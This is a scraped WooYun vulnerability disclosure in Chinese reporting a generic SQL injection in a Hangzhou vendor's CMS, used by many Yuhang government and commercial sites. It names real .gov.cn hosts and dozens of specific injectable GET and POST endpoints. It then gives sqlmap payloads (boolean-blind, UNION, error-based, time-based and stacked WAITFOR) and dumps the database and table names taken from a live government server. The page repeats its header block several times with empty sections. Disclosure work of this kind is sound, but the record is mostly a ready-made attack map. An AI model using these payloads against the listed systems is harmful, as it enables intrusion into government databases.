浙江某软件公司程序存在通用型SQL注入

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-052463

漏洞标题：浙江某软件公司程序存在通用型SQL注入

漏洞作者： HackBraid

提交时间：2014-03-02 20:37

修复时间：2014-05-31 20:38

公开时间：2014-05-31 20:38

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-03-02：细节已通知厂商并且等待厂商处理中
2014-03-07：厂商已经确认，细节仅向厂商公开
2014-03-10：细节向第三方安全合作伙伴开放
2014-05-01：细节向核心白帽子及相关领域专家公开
2014-05-11：细节向普通白帽子公开
2014-05-21：细节向实习白帽子公开
2014-05-31：细节向公众公开

简要描述：

貌似整个市所有的政府网、电商、学校都在用

详细说明：

技术支持：杭州网尽信息科技有限公司
给人的感觉是余杭市所有的网站都在用这套网站
谷歌下收集的url：
1.http://www.yhfg.gov.cn/
2.http://www.yhjt.gov.cn/
3.http://www.hzyhldbz.gov.cn/
4.http://www.yhjsj.gov.cn/
5.http://www.yhdj.gov.cn/
6.http://yggc.yhlz.gov.cn/
7.http://www.yhls.gov.cn/
8.http://www.zjfuture.gov.cn/
9.http://www.yhtyzx.gov.cn/
10.http://wsj.yuhang.gov.cn/
11.http://www.yhjtjt.com/
12.http://www.yhland.gov.cn/
13.http://www.yhsjj.gov.cn/
14.http://www.zjgia.org.cn/
15.http://www.yhgcc.com
16.http://www.hitcc.cn/
17.http://www.yhlpsy.com/
18.http://www.yhsqxy.com/
19.http://www.dabongtech.com/
20.http://www.yhgh.org/
21.http://www.hztxsx.com/
22.http://www.yhlz.gov.cn/
检测gov.cn的站点发现12个有7个存在多处注入点，如下：
1.http://www.yhfg.gov.cn/
http://www.yhfg.gov.cn/messages_detail.aspx password=88952634&classid=5&membername=88952634 存在POST sql注入漏洞
http://www.yhfg.gov.cn/list.aspx =88952634&stype=1&filterkeyword=88952634 存在POST sql注入漏洞
http://www.yhfg.gov.cn/messages.aspx?classid=5 __VIEWSTATE=%2FwEPDwUKMTgzNzAwNTUyMw9kFgJmD2QWAgIBD2QWBAIBD2QWAmYPFgIeC18hSXRlbUNvdW50AgQWCGYPZBYCZg8VBBhtZXNzYWdlcy5hc3B4P2NsYXNzaWQ9MjcAAAzmiJHopoHlkqjor6JkAgEPZBYCZg8VBBhtZXNzYWdlcy5hc3B4P2NsYXNzaWQ9MjgAAAzmiJHopoHlu7rorq5kAgIPZBYCZg8VBBhtZXNzYWdlcy5hc3B4P2NsYXNzaWQ9MjkAAAzmiJHopoHmipXor4lkAgMPZBYCZg8VBBhtZXNzYWdlcy5hc3B4P2NsYXNzaWQ9MzAAAAzkv6Hku7blpITnkIZkAgUPZBYCAgMPDxYCHgdWaXNpYmxlaGRkZLifm8IZkVPiKTvsTLIUIz5pCjlK&__VIEWSTATEGENERATOR=8EE02EF5&action=add&search_pwd=88952634 存在POST sql注入漏洞
2.http://www.yhjt.gov.cn/
http://www.yhjt.gov.cn/sltszt/pic.aspx?classid=107 存在sql注入漏洞
http://www.yhjt.gov.cn/sltszt/news.aspx?classid=105 存在sql注入漏洞
3.http://www.hzyhldbz.gov.cn/
http://www.hzyhldbz.gov.cn/sun_more.aspx?classid=434&item=0 classid=434 存在sql注入漏洞
http://www.hzyhldbz.gov.cn/search.aspx __VIEWSTATE=%2FwEPDwULLTIxMTE2NzE1MDdkZB3l0iR%2BPgpLIUfm4JRbi%2FLwNTk%2B&TextXM=88952634&TextSFZH=88952634&Btnsearch=%EF%BF%BD%EF%BF%BD%D1%AF&TextZSHM=88952634 存在POST sql注入漏洞
4.http://www.yhjsj.gov.cn/
http://www.yhjsj.gov.cn/newsshow-pic.asp?id=123 存在sql注入漏洞
http://www.yhjsj.gov.cn/info.asp?id=4 存在sql注入漏洞
http://www.yhjsj.gov.cn/city.asp?id=234 存在sql注入漏洞
http://www.yhjsj.gov.cn/newsshow.asp?ID=6601 存在sql注入漏洞
http://www.yhjsj.gov.cn/gsl.asp?id=339&lid=5 id=339 存在sql注入漏洞
http://www.yhjsj.gov.cn/search.asp imageField=88952634&keyword=%3D'%D5%BE%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%CF%A2%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD')%7Bthis.value%3D''%7D 存在POST sql注入漏洞
http://www.yhjsj.gov.cn/office/other/login2.asp password=88952634&username=88952634 存在POST sql注入漏洞
http://www.yhjsj.gov.cn/aboutiframe.asp?id=45 存在sql注入漏洞
http://www.yhjsj.gov.cn/search.asp?keyword= 存在sql注入漏洞
5.http://www.yhdj.gov.cn/
http://www.yhdj.gov.cn/special/hzno9/news.aspx?classid=249 存在sql注入漏洞
http://www.yhdj.gov.cn/special/hzno9/feedbackList.aspx?classid=252 存在sql注入漏洞
http://www.yhdj.gov.cn/special/xzfz/news.aspx?classid=205 存在sql注入漏洞
http://www.yhdj.gov.cn/special/xzfz/feedbackList.aspx?classid=213 存在sql注入漏洞
http://www.yhdj.gov.cn/special/llxb/news.aspx?classid=163 存在sql注入漏洞
http://www.yhdj.gov.cn/special/llxb/feedbackList.aspx?classid=173 存在sql注入漏洞
http://www.yhdj.gov.cn/special/2011/pic.aspx?classid=224 存在sql注入漏洞
http://www.yhdj.gov.cn/special/2011/news.aspx?classid=225 存在sql注入漏洞
http://www.yhdj.gov.cn/beautiful/news.aspx?classid=122 存在sql注入漏洞
http://www.yhdj.gov.cn/special/2011/feedbackList.aspx?classid=228 存在sql注入漏洞
http://www.yhdj.gov.cn/kxfzg/List.aspx?classid=84 存在sql注入漏洞
http://vod.yhdj.gov.cn/playList.aspx?cid=1 存在sql注入漏洞
http://www.yhdj.gov.cn/diaocha/list.aspx?cid=3 dc_t13=88952634&dc_r7=6 存在POST sql注入漏洞
http://vod.yhdj.gov.cn/news.aspx filterkeyword=88952634&imageField3=88952634&classid=0 存在POST sql注入漏洞
6.http://yggc.yhlz.gov.cn/
http://yggc.yhlz.gov.cn/iteminfo.aspx?itemID=80 存在sql注入漏洞
http://yggc.yhlz.gov.cn/newlist.aspx?categoryID=11 存在sql注入漏洞
http://yggc.yhlz.gov.cn/search.aspx textfield=88952634&selyear=88952634 存在POST sql注入漏洞
http://yggc.yhlz.gov.cn/iteminfo.aspx?itemID=80 存在sql注入漏洞
7.http://www.yhls.gov.cn/
http://www.yhls.gov.cn/news.aspx?classid=14 存在sql注入漏洞
http://www.yhls.gov.cn/pic.aspx?classid=32 存在sql注入漏洞
http://www.yhls.gov.cn/news.aspx?deep=1&classid=20 classid=20 存在sql注入漏洞
http://www.yhls.gov.cn/xxgk/newsshow.aspx?artid=13961&classid=125 artid=13961 存在sql注入漏洞
http://www.yhls.gov.cn/news.aspx filterkeyword=88952634&imageField=88952634&classid=0 存在POST sql注入漏洞

漏洞证明：

1.http://www.yhfg.gov.cn/

available databases [30]:
[*] jjdd_2007
[*] jjdd_2009_car
[*] JTSafe
[*] lsj
[*] master
[*] model
[*] msdb
[*] Northwind
[*] prjsunlinght
[*] ProjectReserve
[*] pubs
[*] SafetySurvey
[*] safetySurvey_2013
[*] tempdb
[*] YH_BTMS
[*] yhajj
[*] YHBZB
[*] yhczj
[*] yhfgw
[*] yhhszh_2012
[*] yhjsj_oa
[*] yhjw
[*] yhkjj
[*] yhlz_gov
[*] yhrd
[*] yhsafe_HiddenTrouble
[*] yhsafetymanagement
[*] yhsjw
[*] yhzsw

Database: YHBZB
[113 tables]
+------------------------------+
| AD_Couplet                   |
| ArtClass                     |
| ArtKeyNumber                 |
| ArtPushDocument              |
| ArtSubAttribute              |
| ArtTemplet                   |
| Articles                     |
| BS_Correlative               |
| BS_Department                |
| BS_SX_Correlative            |
| BS_ShiXiang                  |
| Category                     |
| CharView                     |
| ColumnsCount                 |
| Correct                      |
| DC_Class                     |
| DC_ClassZ                    |
| DC_Info                      |
| DC_Option                    |
| DC_User                      |
| DateTime                     |
| Department                   |
| FileCategory                 |
| FileCategoryRelation         |
| FileType                     |
| FilterWord                   |
| ImageInformation             |
| InfoDepartment               |
| InfoType                     |
| Information                  |
| JdzComment                   |
| JdzSubject                   |
| Leader                       |
| LeaderDepartment             |
| LeaderRelation               |
| M_C                          |
| Mail                         |
| Message_del                  |
| Message_table                |
| Project                      |
| ProjectPlan                  |
| ProjectProcess               |
| ProjectRelationShip          |
| Remark_table                 |
| SpecialSubjectComment        |
| SystemLog                    |
| VIEW1                        |
| VIEW2                        |
| VIEW3                        |
| VIEW3g                       |
| VIEW4                        |
| VIEW5                        |
| VIEW6                        |
| VIEW7                        |
| VIEW8                        |
| VIEW_ManYiBuManYiDanWei      |
| VIEW_OpenArticles            |
| VIEW_XXGK_Articles           |
| VIEW_XXGK_DepartmentCategory |
| VIEW_t                       |
| VIEW_t2                      |
| aqscr                        |
| art_department               |
| artdepartment                |
| bs_department_link           |
| columnshits                  |
| dtproperties                 |
| hy_dingdan                   |
| hy_users                     |
| imgart                       |
| newclass                     |
| oldclass                     |
| optionid_del                 |
| sp_at                        |
| sysconstraints               |
| syssegments                  |
| tab_ClassMapped              |
| tab_LiuYan                   |
| tab_artAuditing              |
| tab_bum                      |
| tab_collection               |
| tab_comment                  |
| tab_config                   |
| tab_dictionary               |
| tab_feedback                 |
| tab_friendlylink             |
| tab_group                    |
| tab_group_class              |
| tab_log                      |
| tab_module                   |
| tab_mokuai                   |
| tab_piao                     |
| tab_poll                     |
| tab_popup                    |
| tab_prjectSchedule           |
| tab_project                  |
| tab_skin                     |
| tab_tem                      |
| tab_tem_del                  |
| tab_txl                      |
| tab_user                     |
| tab_user_class               |
| tab_vote                     |
| tab_web                      |
| tab_web_user                 |
| temp_XXGK_delartmentInfo     |
| view_artauditing             |
| view_articles                |
| vod_class                    |
| vod_info                     |
| vod_server                   |
| votemsgtem                   |
| voteview                     |
+------------------------------+

2.http://www.yhjt.gov.cn/

Place: GET
Parameter: classid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: classid=107) AND 4597=4597 AND (6212=6212
    Type: UNION query
    Title: Generic UNION query (NULL) - 52 columns
    Payload: classid=107) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(103)+CHAR(100)+CHAR(115)+CHAR(113)+CHAR(121)+CHAR(103)+CHAR(107)+CHAR(109)+CHAR(74)+CHAR(121)+CHAR(82)+CHAR(109)+CHAR(78)+CHAR(102)+CHAR(113)+CHAR(118)+CHAR(121)+CHAR(110)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: classid=107) AND 5453=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (9856=9856
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000

3.http://www.hzyhldbz.gov.cn/

Place: GET
Parameter: classid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: classid=434) AND 9244=9244 AND (5146=5146&item=0
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000

Place: POST
Parameter: TextXM
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwULLTIxMTE2NzE1MDdkZB3l0iR+PgpLIUfm4JRbi/LwNTk+&TextXM=88952634'; WAITFOR DELAY '0:0:5'--&TextSFZH=88952634&Btnsearch=%EF%BF%BD%EF%BF%BD%D1%AF&TextZSHM=88952634
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwULLTIxMTE2NzE1MDdkZB3l0iR+PgpLIUfm4JRbi/LwNTk+&TextXM=88952634' WAITFOR DELAY '0:0:5'--&TextSFZH=88952634&Btnsearch=%EF%BF%BD%EF%BF%BD%D1%AF&TextZSHM=88952634
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000

4.http://www.yhjsj.gov.cn/

Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=123 AND 5098=5098
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: id=-8637 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(121)&CHR(109)&CHR(117)&CHR(113)&CHR(98)&CHR(118)&CHR(81)&CHR(97)&CHR(117)&CHR(83)&CHR(70)&CHR(113)&CHR(97)&CHR(111)&CHR(113)&CHR(107)&CHR(107)&CHR(109)&CHR(113),NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access

5.http://www.yhdj.gov.cn/

Place: GET
Parameter: classid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: classid=249) AND 7067=7067 AND (3200=3200
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: classid=249) AND 3608=CONVERT(INT,(SELECT CHAR(113)+CHAR(116)+CHAR(103)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3608=3608) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(109)+CHAR(97)+CHAR(113))) AND (6360=6360
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: classid=249) AND 7999=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (5214=5214
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000

6.http://yggc.yhlz.gov.cn/

Place: GET
Parameter: categoryID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: categoryID=11 AND 2309=2309
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: categoryID=11 AND 2419=CONVERT(INT,(SELECT CHAR(113)+CHAR(117)+CHAR(113)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN (2419=2419) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(100)+CHAR(121)+CHAR(122)+CHAR(113)))
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: categoryID=(SELECT CHAR(113)+CHAR(117)+CHAR(113)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN (6420=6420) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(100)+CHAR(121)+CHAR(122)+CHAR(113))
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000

7.http://www.yhls.gov.cn/

Place: GET
Parameter: classid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: classid=14) AND 8196=8196 AND (7579=7579
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: classid=14) AND 9532=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(109)+CHAR(116)+CHAR(113)+(SELECT (CASE WHEN (9532=9532) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(99)+CHAR(113))) AND (5828=5828
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: classid=14) AND 5639=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (2711=2711
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000

修复方案：

您懂！

版权声明：转载请注明来源 HackBraid@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2014-03-07 09:34

厂商回复：

CNVD确认并在多个实例上复现所述情况，已经转由CNCERT下发给浙江分中心处置，要求处置到每个单位。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-052463

漏洞标题：浙江某软件公司程序存在通用型SQL注入

相关厂商：cncert国家互联网应急中心

漏洞作者： HackBraid

提交时间：2014-03-02 20:37

修复时间：2014-05-31 20:38

公开时间：2014-05-31 20:38

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 HackBraid@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-052463

漏洞标题：浙江某软件公司程序存在通用型SQL注入

相关厂商：cncert国家互联网应急中心

漏洞作者： HackBraid

提交时间：2014-03-02 20:37

修复时间：2014-05-31 20:38

公开时间：2014-05-31 20:38

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-052463"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 HackBraid@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：